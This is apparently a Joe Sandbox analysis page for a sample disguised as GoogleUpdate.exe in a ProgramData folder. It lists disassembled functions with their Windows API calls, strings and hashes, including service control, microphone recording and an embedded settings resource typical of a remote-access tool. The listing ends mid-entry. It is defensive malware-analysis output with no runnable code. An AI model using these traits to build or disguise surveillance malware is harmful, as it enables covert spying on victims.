Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: e85613c70ade42cc09a5e29631bc5df2b55fc78627f717a2ce68a963f994c174
Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
Opcode Fuzzy Hash: e85613c70ade42cc09a5e29631bc5df2b55fc78627f717a2ce68a963f994c174
Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9

Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 0bca7e064012bf7647cb0938be93fbdbcf9017c0a1d18544c828a485767229c1
Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
Opcode Fuzzy Hash: 0bca7e064012bf7647cb0938be93fbdbcf9017c0a1d18544c828a485767229c1
Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9

Function 0040184A Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040189E
ExitThread.KERNEL32 ref: 004018D6
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

Strings

7i, xrefs: 004018E2
8:G, xrefs: 00401868

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: 7i$8:G
API String ID: 1649129571-397755072
Opcode ID: aa88b34fec3864d56308d90bf3a1e9e4aa9725fc2a208c8e3b87a3743ec969d4
Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
Opcode Fuzzy Hash: aa88b34fec3864d56308d90bf3a1e9e4aa9725fc2a208c8e3b87a3743ec969d4
Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E

Function 00440935 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\GoogleDat\GoogleUpdate.exe,00000104), ref: 00440975
_free.LIBCMT ref: 00440A40
_free.LIBCMT ref: 00440A4A

Strings

C:\ProgramData\GoogleDat\GoogleUpdate.exe, xrefs: 0044096C, 00440973, 004409A2, 004409DA
5g, xrefs: 0044097B

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\ProgramData\GoogleDat\GoogleUpdate.exe$5g
API String ID: 2506810119-3182272332
Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59

Function 00440F33 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

0Zj, xrefs: 00440F36

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID:
String ID: 0Zj
API String ID: 0-907608346
Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568

Function 0040966D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6

Strings

h G, xrefs: 00409698

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: h G
API String ID: 1958988193-3300504347
Opcode ID: 69967f799420f26f2b02874191ad9bb2a384d5afdd26a511e67be7982d0c8c16
Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
Opcode Fuzzy Hash: 69967f799420f26f2b02874191ad9bb2a384d5afdd26a511e67be7982d0c8c16
Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E

Function 0041B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041B310
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
GetLastError.KERNEL32 ref: 0041B335

Strings

MsgWindowClass, xrefs: 0041B2DB
0, xrefs: 0041B2E0

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 98acc1d12319c165810c3a8101ac83cded611685f47401b5bc5866d6e0782eef
Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
Opcode Fuzzy Hash: 98acc1d12319c165810c3a8101ac83cded611685f47401b5bc5866d6e0782eef
Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4

Function 00437603 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043761A

Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C

_UnwindNestedFrames.LIBCMT ref: 00437631
___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
CallCatchBlock.LIBVCRUNTIME ref: 00437667

Strings

/zC, xrefs: 00437626, 00437617

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: /zC
API String ID: 2633735394-4132788633
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98

Function 0041739D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 004173AA
GetSystemMetrics.USER32(0000004D), ref: 004173B0
GetSystemMetrics.USER32(0000004E), ref: 004173B6
GetSystemMetrics.USER32(0000004F), ref: 004173BC

Strings

]tA, xrefs: 004173EB

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID: ]tA
API String ID: 4116985748-3517819141
Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94

Function 0044083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 0044085A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 00440890

Strings

mscoree.dll, xrefs: 00440853
CorExitProcess, xrefs: 00440865

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98

Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

Connection KeepAlive | Disabled, xrefs: 004050D9

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive | Disabled
API String ID: 2993684571-3818284553
Opcode ID: 4a255669a7b4c14ef842559232f525da28a9eda0faf2035cec84cec7ea83ecf5
Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
Opcode Fuzzy Hash: 4a255669a7b4c14ef842559232f525da28a9eda0faf2035cec84cec7ea83ecf5
Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A

Function 00418D76 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
Sleep.KERNEL32(00002710), ref: 00418DBD
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6

Strings

Alarm triggered, xrefs: 00418D7F

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: 5fd2147961172c793483164682d526a6ae8659ed9ea9cff09775d5c3c1313662
Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
Opcode Fuzzy Hash: 5fd2147961172c793483164682d526a6ae8659ed9ea9cff09775d5c3c1313662
Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF

Function 00419493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE

Strings

SETTINGS, xrefs: 00419497

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19

Function 0043BB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
Opcode Fuzzy Hash: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9

Function 0044220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

_free.LIBCMT ref: 00442318
_free.LIBCMT ref: 0044232F
_free.LIBCMT ref: 0044234E
_free.LIBCMT ref: 00442369
_free.LIBCMT ref: 00442380

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: bba606fc377604b84075189b83cc930c3fba5f0d417d2f8c667cfcff3c73436f
Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
Opcode Fuzzy Hash: bba606fc377604b84075189b83cc930c3fba5f0d417d2f8c667cfcff3c73436f
Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48

Function 004412F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044136B
_free.LIBCMT ref: 0044138B

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84

Function 0044E30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6), ref: 0044E359
__alloca_probe_16.LIBCMT ref: 0044E391
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?), ref: 0044E3E2
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?,00000002,00000000), ref: 0044E3F4
__freea.LIBCMT ref: 0044E3FD

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9dc6cc1fdef4dc270a754d83214cf98ce3b1f09711057b0210b2fe42f7f24333
Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
Opcode Fuzzy Hash: 9dc6cc1fdef4dc270a754d83214cf98ce3b1f09711057b0210b2fe42f7f24333
Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98

Function 00401BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
